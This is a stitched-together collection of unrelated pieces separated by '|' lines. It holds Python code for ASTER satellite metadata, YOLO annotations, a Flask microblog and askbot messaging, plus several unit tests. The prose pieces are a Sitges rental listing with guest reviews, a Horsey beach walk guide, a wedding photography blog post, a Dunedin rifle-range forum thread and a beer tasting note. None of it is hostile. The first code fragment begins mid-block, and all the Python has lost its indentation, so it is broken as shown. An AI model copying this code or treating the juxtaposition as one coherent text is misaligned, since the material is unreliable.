self.metadata['LL']='%s,%s' % tuple(ext[3])
self.metadata['metadata']='\n'.join(['%s: %s' %(m,hdf_md[m]) for m in hdf_md])
self.metadata['satellite']='Terra'
self.metadata['sensor']='ASTER'
self.metadata['filetype'] = self._gdaldataset.GetDriver().ShortName+'/'+self._gdaldataset.GetDriver().LongName + ' (ASTER)'
self.metadata['sceneid'] = hdf_md['ASTERSCENEID']
self.metadata['level'] = hdf_md['PROCESSINGLEVELID']
if '-' in hdf_md['CALENDARDATE']:imgdate = hdf_md['CALENDARDATE']
else:imgdate = time.strftime(utilities.dateformat,time.strptime(hdf_md['CALENDARDATE'],'%Y%m%d')) #ISO 8601
imgtime = hdf_md.get('TIMEOFDAY')
if imgtime:self.metadata['imgdate'] = time.strftime(utilities.datetimeformat,time.strptime(imgdate+imgtime[0:6],'%Y-%m-%d%H%M%S')) #ISO 8601
else:self.metadata['imgdate'] = imgdate
#self.metadata['imgdate'] = hdf_md['CALENDARDATE']
self.metadata['cloudcover'] = float(hdf_md['SCENECLOUDCOVERAGE'])
if hdf_md['FLYINGDIRECTION']=='DE':self.metadata['orbit'] = 'Descending'
else:self.metadata['orbit'] = 'Ascending'
self.metadata['rotation']=float(hdf_md.get('MAPORIENTATIONANGLE',hdf_md.get('SCENEORIENTATIONANGLE')))
if abs(self.metadata['rotation']) < 1.0: self.metadata['orientation']='Map oriented'
else: self.metadata['orientation']='Path oriented'
self.metadata['sunazimuth'],self.metadata['sunelevation']=map(float,hdf_md['SOLARDIRECTION'].split(','))
self.metadata['viewangle'] = float(hdf_md['POINTINGANGLE'])
self.metadata['cols'] = ncols
self.metadata['rows'] = nrows
self.metadata['nbands'] = nbands
self.metadata['datatype'] = datatypes
self.metadata['nbits'] = nbits
self.metadata['nodata']=','.join(['0' for i in range(0,nbands)])
self.metadata['bands'] = bands
self.metadata['resampling'] = hdf_md.get('RESMETHOD1') #Assume same for all...
self.metadata['srs']= srs
self.metadata['epsg']= spatialreferences.IdentifyAusEPSG(srs)
self.metadata['units']= units
self.metadata['cellx'],self.metadata['celly']=cellxy,cellxy
#Geotransform
ext=[[ulx,uly],[urx,ury],[lrx,lry],[llx,lly],[ulx,uly]]
ncols=map(int, str(ncols).split(','))
nrows=map(int, str(nrows).split(','))
cellx,celly=[],[]
j=0
while j < len(ncols):
gcps=[];i=0
lr=[[0,0],[ncols[j],0],[ncols[j],nrows[j]],[0,nrows[j]]]
while i < len(ext)-1: #don't need the last xy pair
gcp=gdal.GCP()
gcp.GCPPixel,gcp.GCPLine=lr[i]
gcp.GCPX,gcp.GCPY=ext[i]
gcp.Id=str(i)
gcps.append(gcp)
i+=1
j+=1
geotransform = gdal.GCPsToGeoTransform(gcps)
x,y=geometry.CellSize(geotransform)
cellx.append(str(x))
celly.append(str(abs(y)))
self.metadata['cellx']=','.join(cellx)
self.metadata['celly']=','.join(celly)
srs=osr.SpatialReference()
srs.ImportFromEPSG(4326)
self.metadata['srs']= srs.ExportToWkt()
self.metadata['UL']='%s,%s' % tuple(ext[0])
self.metadata['UR']='%s,%s' % tuple(ext[1])
self.metadata['LR']='%s,%s' % tuple(ext[2])
self.metadata['LL']='%s,%s' % tuple(ext[3])
self.metadata['metadata']='\n'.join(['%s: %s' %(m,hdf_md[m]) for m in hdf_md])
self.metadata['filesize']=sum([os.path.getsize(file) for file in self.filelist])
self.metadata['compressionratio']=0
self.metadata['compressiontype']='None'
self.extent=ext
#Build gdaldataset object for overviews
vrtcols=ncols[0]
vrtrows=nrows[0]
#vrtbands=[sd for sd,sn in hdf_sd[0:4]]#The 4 VNIR bands
vrtbands=hdf_sd[0:4]#The 4 VNIR bands
vrt=geometry.CreateSimpleVRT(vrtbands,vrtcols,vrtrows,datatypes.split(',')[0])
self._gdaldataset=geometry.OpenDataset(vrt)
for i in range(1,5):
self._gdaldataset.GetRasterBand(i).SetNoDataValue(0)
|
This short-term rental loft has an area of 35m2 and is located in a building with elevator on the first floor. The entire apartment has been renovated and decorated by the interior design studio GrupTell 1936. It can accommodate three people in a room with double bed, and a bunk bed in the living-room area. The bathroom is modern, and the large kitchen is equipped with washing machine, microwave, coffee machine, kettle and fridge/freezer. The apartment has TV, Wi-Fi, heating, air conditioning, sheets, blankets and towels.
This holiday Accommodation is part of the same building as Montroig 2, in the so-called Street of sin (Marqués de Montroig), the clubbing street of Sitges. This picturesque town of Sitges is 35km south of Barcelona, a medieval town lining the coast. The Old town, located on a hill around the San Bartolomé y Santa Tecla church (XVII), offers a stunning architectural and cultural heritage. It is also worth noting the beautiful La Ribera beach, frequented both by locals and tourists, with its golden fine sand and its calm waves.
A great location, only a few minutes walk to the beach, 10 minutes walk to the train station and 5 minutes drive to the highway that will take you to Barcelona and 20 to 30 minutes drive to Barcelona’s International Airport El Prat (30km).
• Mile i sympatyczne wczasy spedzilem w tym apartamecie.
• Very little facilities. No microwave. On E bin bag for a week. no toilet detergent absolutely no shower gell or shampoo. I arrived late so it was difficult to by these things on till the nxt day. U booked n apoartment so I could use the washing machine but no clothes pegs!!! Small thongs that vould have made a big difference.
• mixed experience… • The flat was quite well furnished (lots of storage), and the bed comfortable….
• An excellent location, in central Sitges, with good facilities – but very quiet! The keyholder / local agent was very accommodating when it came to checking in and out.
• The wifi was a little temperamental, but that’s our only complaint.
• Locatie is perfect maar elke keer als je wifi vraagt krijg je een connectie om suikerziekte op te lopen. Ik spreek in het algemeen En dat vinden de eigenaars in Sitges niet zo belangrijk.
• Je voelt je opgesloten in het appartement. Misschien hebben de andere gasten meer geluk dan ik omdat ze een balkon on een terras hadden maar ik voelde me wel opgesloten.
|
from raptiformica.distributed.members import try_get_members_list
from tests.testcase import TestCase
class TestTryGetMembersList(TestCase):
def setUp(self):
self.try_machine_command = self.set_up_patch('raptiformica.distributed.members.try_machine_command')
self.try_machine_command.return_value = ('output', '5.6.7.8', '22')
self.host_and_port_pairs = [
('1.2.3.4', '2222'),
('5.6.7.8', '22')
]
def test_try_get_members_list_tries_machine_command(self):
try_get_members_list(self.host_and_port_pairs)
expected_command = ['consul', 'members']
self.try_machine_command.assert_called_once_with(
self.host_and_port_pairs,
expected_command,
attempt_message="Trying to get members list from {}:{}",
all_failed_message="Could not list members in the distributed network. "
"Maybe no meshnet has been established yet. "
"Do you have at least three machines running?"
)
def test_try_get_members_list_returns_output_from_first_successful_members_list(self):
ret = try_get_members_list(self.host_and_port_pairs)
self.assertEqual(ret, 'output')
|
Experience the Horsey Broadland landscape with the National Trust, on this 3 mile return walk to the beach, following grassy paths and tracks, encompassing low-lying grazing marshes, sand dunes and a narrow sandy beach, with a chance of seeing Grey Seals.
Please note that this walk has been made possible with kind permission from the Buxton family who manage it.
Horsey Windpump, Great Yarmouth, Norfolk NR29 4EF.
From the car park head back towards the entrance and visit Horsey Staithe Stores (Mar-Nov) for information on the area, a warm welcome and a quick cup of tea of coffee. From the Stores, cross the road (please take care) and go through the gates imediately opposite.
Standing sentinel over the moorings at the Staithe, the last tower mill built in the Broads in 1912 offers superb views over Horsey mere and the surrounding countryside and coast. Set within the Broads National Park, the Horsey Estate is an internationally important site for wildlife. It offers a great spot for bird-watching and for wintering wildfowl.
Head straight across the field for 0.3 miles (480 metres) keeping the ditch on your left. Be aware that there may be livestock in the fields, which help to keep the grass short suitable for breeding and over-wintering birds such as waders and geese.
At the end of the field turn left and go over a stile and walk for 0.1 miles (167 metres). This field could also hold livestock and then continue onto a track for 300 metres (0.2 miles).
At the end of the track turn right onto a narrow lane and at the junction of two red brick cottages continue past a barrier to follow a grassy track.
Follow the track for 0.4 miles (650 metres). The small fields either side are much wetter. In the summer months looks for butterflies and dragonflies. These marshes are much more closed-in structure hiding wildlife such as lapwings, red-shanks and small mammals. You can see the old network of drainage channels that dissect the area.
The Horsey Estate, a mysterious Broadland landscape, is internationally important for its habitats and wealth of wildlife some of which is unique to the area such as Britain’s largest butterfly the Swallowtail. The Estate was acquired by the National Trust in 1948 from the Buxton family who continue to manage the Horsey Estate to this day. This walk has been made possible by kind permission of the Horsey Estate Trust.
You have now reached the sand dunes that run along this stretch of the coast. Follow designated access tracks that lead up and over them. Grey seals can often be seen here. Please give them a wide berth and keep any dogs under control. In the winter the Friends of Horsey seals are on hand to talk about the seal pups and to give information on how to see them. Please note that the beach is closed October to January to provide a wildlife sanctuary.
Both species of seal that live in the UK can be seen on the beach at Horsey. Common seals despite their name are fewer in numbers than the larger Grey seals and are more often seen outside the Grey seal pupping season. The grey seals come pup on the beach between October and March. The white coat pups are very vulnerable and are completely reliant on their mothers milk enabling them to wean and as they develop their waterproof coat.
After walking the beach, return to Horsey Staithe Stores via the same route. The Nelson Head Pub is located just a little inland along the lane at Point 4. When you reach the road next to the Stores take care crossing it. Toilets are in the car park.
There is one stile on the route and marshes can become muddy and wet outside the summer months. Suitable footwear will be necessary. For guidance on how to see the seals without disturbing them please refer to www.friendsofhorseyseals.co.uk. Please give seals a wide berth and follow any information and signs on the site. For more information please visit www.friendsofhorseyseals.co.uk. Dogs welcome but need to be kept on leads or close control, especially when crossing fields with livestock. Please respect other visitors. Please 'Bag and bin'.
On B1159, 22 miles (35.2km) east of Norwich taking A47 via Acle and Martham, or 11.6 miles (18.7km) north of Great Yarmouth. Postcode NR29 4EF.
2.5 miles (4km) from West Somerton; 4 miles (6.4km) from Winterton on Sea, via public paths and highway.
Hire craft at Potter Heigham, Martham and Whispering Reeds, Hickling. Access to Horsey Mere via Meadow Dyke from Heigham Sound and river network. NOTE: please avoid Mere Nov-Mar to avoid disturbing the wildfowl refuge.
Parking - NT Pay & Display car park & drop-off point.
WC's - NT toilets, accessible toilet & shower.
Food and drink: Horsey Staithe Stores (next to Horsey Windpump) - March-November for snacks and light refreshments. See website for opening times. Nelson Head public house and restaurant is open from 11am.
Experience the Broadland landscape and wealth of wildlife of the Horsey Estate, with its Mere, reedbeds, marshes and drainage mills on this circular estate walk.
|
"""models for the ``group_messaging`` app
"""
import copy
import datetime
import urllib
from askbot.mail import send_mail #todo: remove dependency?
from django.template.loader import get_template
from django.db import models
from django.db.models import signals
from django.conf import settings as django_settings
from django.contrib.auth.models import Group
from django.contrib.auth.models import User
from django.contrib.sites.models import Site
from django.utils.importlib import import_module
from django.utils.translation import ugettext as _
MAX_HEADLINE_LENGTH = 80
MAX_SENDERS_INFO_LENGTH = 64
MAX_SUBJECT_LINE_LENGTH = 30
#dummy parse message function
parse_message = lambda v: v
GROUP_NAME_TPL = '_personal_%s'
def get_recipient_names(recipient_groups):
"""returns list of user names if groups are private,
or group names, otherwise"""
names = set()
for group in recipient_groups:
if group.name.startswith('_personal_'):
names.add(group.user_set.all()[0].username)
else:
names.add(group.name)
return names
def get_personal_group_by_user_id(user_id):
return Group.objects.get(name=GROUP_NAME_TPL % user_id)
def get_personal_groups_for_users(users):
"""for a given list of users return their personal groups"""
group_names = [(GROUP_NAME_TPL % user.id) for user in users]
return Group.objects.filter(name__in=group_names)
def get_personal_group(user):
"""returns personal group for the user"""
return get_personal_group_by_user_id(user.id)
def create_personal_group(user):
"""creates a personal group for the user"""
group = Group(name=GROUP_NAME_TPL % user.id)
group.save()
return group
class LastVisitTime(models.Model):
"""just remembers when a user has
last visited a given thread
"""
user = models.ForeignKey(User)
message = models.ForeignKey('Message')
at = models.DateTimeField(auto_now_add=True)
class Meta:
unique_together = ('user', 'message')
class SenderListManager(models.Manager):
"""model manager for the :class:`SenderList`"""
def get_senders_for_user(self, user=None):
"""returns query set of :class:`User`"""
user_groups = user.groups.all()
lists = self.filter(recipient__in=user_groups)
user_ids = lists.values_list(
'senders__id', flat=True
).distinct()
return User.objects.filter(id__in=user_ids)
class SenderList(models.Model):
"""a model to store denormalized data
about who sends messages to any given person
sender list is populated automatically
as new messages are created
"""
recipient = models.ForeignKey(Group, unique=True)
senders = models.ManyToManyField(User)
objects = SenderListManager()
class MessageMemo(models.Model):
"""A bridge between message recipients and messages
these records are only created when user sees a message.
The idea is that using groups as recipients, we can send
messages to massive numbers of users, without cluttering
the database.
Instead we'll be creating a "seen" message after user
reads the message.
"""
SEEN = 0
ARCHIVED = 1
STATUS_CHOICES = (
(SEEN, 'seen'),
(ARCHIVED, 'archived')
)
user = models.ForeignKey(User)
message = models.ForeignKey('Message', related_name='memos')
status = models.SmallIntegerField(
choices=STATUS_CHOICES, default=SEEN
)
class Meta:
unique_together = ('user', 'message')
class MessageManager(models.Manager):
"""model manager for the :class:`Message`"""
def get_sent_threads(self, sender=None):
"""returns list of threads for the "sent" mailbox
this function does not deal with deleted=True
"""
responses = self.filter(sender=sender)
responded_to = models.Q(descendants__in=responses, root=None)
seen_filter = models.Q(
memos__status=MessageMemo.SEEN,
memos__user=sender
)
seen_responses = self.filter(responded_to & seen_filter)
unseen_responses = self.filter(responded_to & ~models.Q(memos__user=sender))
return (
self.get_threads(sender=sender) \
| seen_responses.distinct() \
| unseen_responses.distinct()
).distinct()
def get_threads(self, recipient=None, sender=None, deleted=False):
"""returns query set of first messages in conversations,
based on recipient, sender and whether to
load deleted messages or not"""
if sender and sender == recipient:
raise ValueError('sender cannot be the same as recipient')
filter_kwargs = {
'root': None,
'message_type': Message.STORED
}
if recipient:
filter_kwargs['recipients__in'] = recipient.groups.all()
else:
#todo: possibly a confusing hack - for this branch -
#sender but no recipient in the args - we need "sent" origin threads
recipient = sender
user_thread_filter = models.Q(**filter_kwargs)
filter = user_thread_filter
if sender:
filter = filter & models.Q(sender=sender)
if deleted:
deleted_filter = models.Q(
memos__status=MessageMemo.ARCHIVED,
memos__user=recipient
)
return self.filter(filter & deleted_filter)
else:
#rather a tricky query (may need to change the idea to get rid of this)
#select threads that have a memo for the user, but the memo is not ARCHIVED
#in addition, select threads that have zero memos for the user
marked_as_non_deleted_filter = models.Q(
memos__status=MessageMemo.SEEN,
memos__user=recipient
)
#part1 - marked as non-archived
part1 = self.filter(filter & marked_as_non_deleted_filter)
#part2 - messages for the user without an attached memo
part2 = self.filter(filter & ~models.Q(memos__user=recipient))
return (part1 | part2).distinct()
def create(self, **kwargs):
"""creates a message"""
root = kwargs.get('root', None)
if root is None:
parent = kwargs.get('parent', None)
if parent:
if parent.root:
root = parent.root
else:
root = parent
kwargs['root'] = root
headline = kwargs.get('headline', kwargs['text'])
kwargs['headline'] = headline[:MAX_HEADLINE_LENGTH]
kwargs['html'] = parse_message(kwargs['text'])
message = super(MessageManager, self).create(**kwargs)
#creator of message saw it by definition
#crate a "seen" memo for the sender, because we
#don't want to inform the user about his/her own post
sender = kwargs['sender']
MessageMemo.objects.create(
message=message, user=sender, status=MessageMemo.SEEN
)
return message
def create_thread(self, sender=None, recipients=None, text=None):
"""creates a stored message and adds recipients"""
message = self.create(
message_type=Message.STORED,
sender=sender,
senders_info=sender.username,
text=text,
)
now = datetime.datetime.now()
LastVisitTime.objects.create(message=message, user=sender, at=now)
names = get_recipient_names(recipients)
message.add_recipient_names_to_senders_info(recipients)
message.save()
message.add_recipients(recipients)
message.send_email_alert()
return message
def create_response(self, sender=None, text=None, parent=None):
message = self.create(
parent=parent,
message_type=Message.STORED,
sender=sender,
text=text,
)
#recipients are parent's recipients + sender
#creator of response gets memo in the "read" status
recipients = set(parent.recipients.all())
if sender != parent.sender:
senders_group = get_personal_group(parent.sender)
parent.add_recipients([senders_group])
recipients.add(senders_group)
message.add_recipients(recipients)
#add author of the parent as a recipient to parent
#update headline
message.root.headline = text[:MAX_HEADLINE_LENGTH]
#mark last active timestamp for the root message
message.root.last_active_at = datetime.datetime.now()
#update senders info - stuff that is shown in the thread heading
message.root.update_senders_info()
#unarchive the thread for all recipients
message.root.unarchive()
message.send_email_alert()
return message
class Message(models.Model):
"""the message model allowing users to send
messages to other users and groups, via
personal groups.
"""
STORED = 0
TEMPORARY = 1
ONE_TIME = 2
MESSAGE_TYPE_CHOICES = (
(STORED, 'email-like message, stored in the inbox'),
(ONE_TIME, 'will be shown just once'),
(TEMPORARY, 'will be shown until certain time')
)
message_type = models.SmallIntegerField(
choices=MESSAGE_TYPE_CHOICES,
default=STORED,
)
sender = models.ForeignKey(User, related_name='group_messaging_sent_messages')
senders_info = models.CharField(
max_length=MAX_SENDERS_INFO_LENGTH,
default=''
)#comma-separated list of a few names
recipients = models.ManyToManyField(Group)
root = models.ForeignKey(
'self', null=True,
blank=True, related_name='descendants'
)
parent = models.ForeignKey(
'self', null=True,
blank=True, related_name='children'
)
headline = models.CharField(max_length=MAX_HEADLINE_LENGTH)
text = models.TextField(
null=True, blank=True,
help_text='source text for the message, e.g. in markdown format'
)
html = models.TextField(
null=True, blank=True,
help_text='rendered html of the message'
)
sent_at = models.DateTimeField(auto_now_add=True)
last_active_at = models.DateTimeField(auto_now_add=True)
active_until = models.DateTimeField(blank=True, null=True)
objects = MessageManager()
def add_recipient_names_to_senders_info(self, recipient_groups):
names = get_recipient_names(recipient_groups)
old_names = set(self.senders_info.split(','))
names |= old_names
self.senders_info = ','.join(names)
def add_recipients(self, recipients):
"""adds recipients to the message
and updates the sender lists for all recipients
todo: sender lists may be updated in a lazy way - per user
"""
self.recipients.add(*recipients)
for recipient in recipients:
sender_list, created = SenderList.objects.get_or_create(recipient=recipient)
sender_list.senders.add(self.sender)
def get_absolute_url(self, user=None):
"""returns absolute url to the thread"""
assert(user != None)
settings = django_settings.GROUP_MESSAGING
func_path = settings['BASE_URL_GETTER_FUNCTION']
path_bits = func_path.split('.')
url_getter = getattr(
import_module('.'.join(path_bits[:-1])),
path_bits[-1]
)
params = copy.copy(settings['BASE_URL_PARAMS'])
params['thread_id'] = self.id
url = url_getter(user) + '?' + urllib.urlencode(params)
#if include_domain_name: #don't need this b/c
# site = Site.objects.get_current()
# url = 'http://' + site.domain + url
return url
def get_email_subject_line(self):
"""forms subject line based on the root message
and prepends 'Re': if message is non-root
"""
subject = self.get_root_message().text[:MAX_SUBJECT_LINE_LENGTH]
if self.root:
subject = _('Re: ') + subject
return subject
def get_root_message(self):
"""returns root message or self
if current message is root
"""
return self.root or self
def get_recipients_users(self):
"""returns query set of users"""
groups = self.recipients.all()
return User.objects.filter(
groups__in=groups
).exclude(
id=self.sender.id
).distinct()
def get_timeline(self):
"""returns ordered query set of messages in the thread
with the newest first"""
root = self.get_root_message()
root_qs = Message.objects.filter(id=root.id)
return (root.descendants.all() | root_qs).order_by('-sent_at')
def send_email_alert(self):
"""signal handler for the message post-save"""
root_message = self.get_root_message()
data = {'messages': self.get_timeline()}
template = get_template('group_messaging/email_alert.html')
body_text = template.render(data)
subject = self.get_email_subject_line()
for user in self.get_recipients_users():
#todo change url scheme so that all users have the same
#urls within their personal areas of the user profile
#so that we don't need to have loops like this one
thread_url = root_message.get_absolute_url(user)
thread_url = thread_url.replace('&', '&')
#in the template we have a placeholder to be replaced like this:
body_text = body_text.replace('THREAD_URL_HOLE', thread_url)
send_mail(
subject,
body_text,
django_settings.DEFAULT_FROM_EMAIL,
[user.email,],
)
def update_senders_info(self):
"""update the contributors info,
meant to be used on a root message only
"""
senders_names = self.senders_info.split(',')
if self.sender.username in senders_names:
senders_names.remove(self.sender.username)
senders_names.insert(0, self.sender.username)
self.senders_info = (','.join(senders_names))[:64]
self.save()
def unarchive(self, user=None):
"""unarchive message for all recipients"""
archived_filter = {'status': MessageMemo.ARCHIVED}
if user:
archived_filter['user'] = user
memos = self.memos.filter(**archived_filter)
memos.update(status=MessageMemo.SEEN)
def set_status_for_user(self, status, user):
"""set specific status to the message for the user"""
memo, created = MessageMemo.objects.get_or_create(user=user, message=self)
memo.status = status
memo.save()
def archive(self, user):
"""mark message as archived"""
self.set_status_for_user(MessageMemo.ARCHIVED, user)
def mark_as_seen(self, user):
"""mark message as seen"""
self.set_status_for_user(MessageMemo.SEEN, user)
|
I don’t normally do a teaser post for weddings on my blog, but I was too excited about this set of images we shot last week. Brynn and Chris had a vintage 50’s inspired wedding. We managed to “find” this old open barn in Langley bc. The perfect location for their portraits. It seemed to be empty for a quite while, so with every movement we made, the dust unsettled and we got these amazing rays of light coming through the cracks of the walls! I’m not sure how I keep coming across all these barns for weddings around Vancouver, but they make for some good photos! Everything about their wedding was awesome, and they really put work into every little detail. I was lucky to be the one to capture it! Keep posted for more images from their day.
What amazing pictures! I can’t wait to see the rest!
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
import sys
import os
from xml.etree import ElementTree
from xml.etree.ElementTree import Element, SubElement
from lxml import etree
import codecs
from libs.constants import DEFAULT_ENCODING
TXT_EXT = '.txt'
ENCODE_METHOD = DEFAULT_ENCODING
class YOLOWriter:
def __init__(self, folder_name, filename, img_size, database_src='Unknown', local_img_path=None):
self.folder_name = folder_name
self.filename = filename
self.database_src = database_src
self.img_size = img_size
self.box_list = []
self.local_img_path = local_img_path
self.verified = False
def add_bnd_box(self, x_min, y_min, x_max, y_max, name, difficult):
bnd_box = {'xmin': x_min, 'ymin': y_min, 'xmax': x_max, 'ymax': y_max}
bnd_box['name'] = name
bnd_box['difficult'] = difficult
self.box_list.append(bnd_box)
def bnd_box_to_yolo_line(self, box, class_list=[]):
x_min = box['xmin']
x_max = box['xmax']
y_min = box['ymin']
y_max = box['ymax']
x_center = float((x_min + x_max)) / 2 / self.img_size[1]
y_center = float((y_min + y_max)) / 2 / self.img_size[0]
w = float((x_max - x_min)) / self.img_size[1]
h = float((y_max - y_min)) / self.img_size[0]
# PR387
box_name = box['name']
if box_name not in class_list:
class_list.append(box_name)
class_index = class_list.index(box_name)
return class_index, x_center, y_center, w, h
def save(self, class_list=[], target_file=None):
out_file = None # Update yolo .txt
out_class_file = None # Update class list .txt
if target_file is None:
out_file = open(
self.filename + TXT_EXT, 'w', encoding=ENCODE_METHOD)
classes_file = os.path.join(os.path.dirname(os.path.abspath(self.filename)), "classes.txt")
out_class_file = open(classes_file, 'w')
else:
out_file = codecs.open(target_file, 'w', encoding=ENCODE_METHOD)
classes_file = os.path.join(os.path.dirname(os.path.abspath(target_file)), "classes.txt")
out_class_file = open(classes_file, 'w')
for box in self.box_list:
class_index, x_center, y_center, w, h = self.bnd_box_to_yolo_line(box, class_list)
# print (classIndex, x_center, y_center, w, h)
out_file.write("%d %.6f %.6f %.6f %.6f\n" % (class_index, x_center, y_center, w, h))
# print (classList)
# print (out_class_file)
for c in class_list:
out_class_file.write(c+'\n')
out_class_file.close()
out_file.close()
class YoloReader:
def __init__(self, file_path, image, class_list_path=None):
# shapes type:
# [labbel, [(x1,y1), (x2,y2), (x3,y3), (x4,y4)], color, color, difficult]
self.shapes = []
self.file_path = file_path
if class_list_path is None:
dir_path = os.path.dirname(os.path.realpath(self.file_path))
self.class_list_path = os.path.join(dir_path, "classes.txt")
else:
self.class_list_path = class_list_path
# print (file_path, self.class_list_path)
classes_file = open(self.class_list_path, 'r')
self.classes = classes_file.read().strip('\n').split('\n')
# print (self.classes)
img_size = [image.height(), image.width(),
1 if image.isGrayscale() else 3]
self.img_size = img_size
self.verified = False
# try:
self.parse_yolo_format()
# except:
# pass
def get_shapes(self):
return self.shapes
def add_shape(self, label, x_min, y_min, x_max, y_max, difficult):
points = [(x_min, y_min), (x_max, y_min), (x_max, y_max), (x_min, y_max)]
self.shapes.append((label, points, None, None, difficult))
def yolo_line_to_shape(self, class_index, x_center, y_center, w, h):
label = self.classes[int(class_index)]
x_min = max(float(x_center) - float(w) / 2, 0)
x_max = min(float(x_center) + float(w) / 2, 1)
y_min = max(float(y_center) - float(h) / 2, 0)
y_max = min(float(y_center) + float(h) / 2, 1)
x_min = round(self.img_size[1] * x_min)
x_max = round(self.img_size[1] * x_max)
y_min = round(self.img_size[0] * y_min)
y_max = round(self.img_size[0] * y_max)
return label, x_min, y_min, x_max, y_max
def parse_yolo_format(self):
bnd_box_file = open(self.file_path, 'r')
for bndBox in bnd_box_file:
class_index, x_center, y_center, w, h = bndBox.strip().split(' ')
label, x_min, y_min, x_max, y_max = self.yolo_line_to_shape(class_index, x_center, y_center, w, h)
# Caveat: difficult flag is discarded when saved as yolo format.
self.add_shape(label, x_min, y_min, x_max, y_max, False)
|
Thread: Place to Sight in- Dunedin?
Hey does anyone have a heads up on where I could Sight in my Rifle in the Dunedin area?
Rifle ranges? a patch of Doc perhaps?
For just sighting in in Dunedin, the Leith Valley Rifle Range run by NZDA is most convenient.
Open 1pm - 4pm Saturdays, look at their facebook page for cancellations.
$10 fee for non members, $5 for NZDA members.
They have 25m, 50m and 100m target boards, use whichever you want. Bring own drawing pins. They'll supply you with A4 targets, or you can print and bring your own.
There is a black powder range towards Blueskin bay area, but no modern bottle neck cartridges allowed. Sunday mornings.
Alternately, Bruce Rifle Club, in Milton, range down same road you turn onto from SH1 if you are visiting the Otago Corrections Facility, they shoot some Sunday mornings. sometimes during the week, again on the internet. 100, 200, 400 and 600m ranges, but mostly 100 m range is used. You can't shoot 200m if the 100 m range is in use as you'd be shooting over the heads of the 100m users, and health and safety just won't allow such fun.
Micky Duck and Rees like this.
Legend- possibly missed my chance afte reading the FB page! bloody Christmas period !
will keep both those ranges in mind for future!
|
# coding: utf-8
import os
from flask_login import LoginManager
from flask_openid import OpenID
from config import basedir, ADMINS, MAIL_SERVER, MAIL_PORT, MAIL_USERNAME, MAIL_PASSWORD
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_mail import Mail
from momentjs import momentjs
from flask_babel import Babel, lazy_gettext
from flask.json import JSONEncoder
app = Flask(__name__)
app.config.from_object('config')
db = SQLAlchemy(app)
lm = LoginManager()
lm.init_app(app)
lm.login_view = 'login'
lm.login_message = lazy_gettext('请您先登陆。')
oid = OpenID(app, os.path.join(basedir, 'tmp'))
mail = Mail(app)
babel = Babel(app)
if not app.debug:
import logging
from logging.handlers import RotatingFileHandler
file_handler = RotatingFileHandler('tmp/microblog.log', 'a', 1 * 1024 * 1024, 10)
file_handler.setLevel(logging.INFO)
file_handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'))
app.logger.addHandler(file_handler)
app.logger.setLevel(logging.INFO)
app.logger.info('microblog startup')
app.jinja_env.globals['momentjs'] = momentjs
babel = Babel(app)
class CustomJSONEncoder(JSONEncoder):
def default(self, obj):
from speaklater import is_lazy_string
if is_lazy_string(obj):
try:
return unicode(obj) # python 2
except NameError:
return str(obj) # python 3
return super(CustomJSONEncoder, self).default(obj)
app.json_encoder = CustomJSONEncoder
from app import views, models
|
Per's comments: Near black, small head. Fruity nose with syrup and licorice. Very sweet with full body and rounded mouthfeel. Heavy with syrup and caramel as well as coffee and licorice. Warming finish.
|
from bika.lims.content.analysis import Analysis
from bika.lims.testing import BIKA_FUNCTIONAL_TESTING
from bika.lims.tests.base import BikaFunctionalTestCase
from bika.lims.utils.analysisrequest import create_analysisrequest
from bika.lims.workflow import doActionFor
from plone.app.testing import login, logout
from plone.app.testing import TEST_USER_NAME
import unittest
try:
import unittest2 as unittest
except ImportError: # Python 2.7
import unittest
class TestHiddenAnalyses(BikaFunctionalTestCase):
layer = BIKA_FUNCTIONAL_TESTING
def setUp(self):
super(TestHiddenAnalyses, self).setUp()
login(self.portal, TEST_USER_NAME)
servs = self.portal.bika_setup.bika_analysisservices
# analysis-service-3: Calcium (Ca)
# analysis-service-6: Cooper (Cu)
# analysis-service-7: Iron (Fe)
self.services = [servs['analysisservice-3'],
servs['analysisservice-6'],
servs['analysisservice-7']]
# Calcium - Hidden not set
# Copper - Hidden set to False
self.services[1].setHidden(False)
# Iron - Hidden set to True
self.services[2].setHidden(True)
profs = self.portal.bika_setup.bika_analysisprofiles
# analysisprofile-1: Trace Metals
self.analysisprofile = profs['analysisprofile-1']
artemp = self.portal.bika_setup.bika_artemplates
# artemplate-2: Bruma Metals
self.artemplate = artemp['artemplate-2']
def tearDown(self):
# Restore
for s in self.services:
s.setHidden(False)
self.analysisprofile.setAnalysisServicesSettings([])
self.artemplate.setAnalysisServicesSettings([])
logout()
super(TestHiddenAnalyses, self).tearDown()
def test_service_hidden_service(self):
service = self.services[1]
uid = service.UID()
self.assertFalse(service.getHidden())
self.assertFalse(service.Schema().getField('Hidden').get(service))
service.setHidden(False)
self.assertFalse(service.getHidden())
self.assertFalse(service.Schema().getField('Hidden').get(service))
service.setHidden(True)
self.assertTrue(service.getHidden())
self.assertTrue(service.Schema().getField('Hidden').get(service))
# Restore
service.setHidden(False)
def test_service_hidden_profile(self):
# Profile
# For Calcium (unset)
uid = self.services[0].UID();
self.assertFalse(self.services[0].getHidden())
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
# For Copper (False)
uid = self.services[1].UID()
self.assertFalse(self.services[1].getHidden())
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
# For Iron (True)
uid = self.services[2].UID()
self.assertTrue(self.services[2].getHidden())
self.assertTrue(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
# Modify visibility for Calcium in profile
uid = self.services[0].UID();
sets = [{'uid': uid}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': False}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': True}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertTrue(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
